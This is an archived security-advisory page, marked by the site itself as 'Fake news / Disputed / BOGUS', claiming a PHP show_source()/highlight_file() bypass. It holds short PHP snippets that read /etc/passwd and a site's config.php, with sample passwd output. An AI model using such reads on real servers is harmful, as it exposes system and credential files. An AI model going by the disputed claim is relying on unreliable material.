php 4.x php5.2.x all "show_source()" ,"highlight_file()" bypass

WARNING! Fake news / Disputed / BOGUS

php 4.x php5.2.x all "show_source()" ,"highlight_file()" bypass

2009-01-05 / 2009-01-06

Credit: l1un

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

 Ahthoer:Super-Crystal

safe_mode off (tested)
<?
show_source ('/etc/passwd');
?>
Example exploit:
<?
show_source ('/home/user/public_html/config.php');
?>
-----------------------------
highlight_file()

   <? 
highlight_file ("/etc/passwd"); 
?> 
exploit !!!  

root:x:0:0:root:/root:/bin/bash
....
 
:)
 
greetz:php.net!

th4nx securityfocus

References:

http://seclists.org/bugtraq/2009/Jan/0012.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

php 4.x php5.2.x all "show_source()" ,"highlight_file()" bypass

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.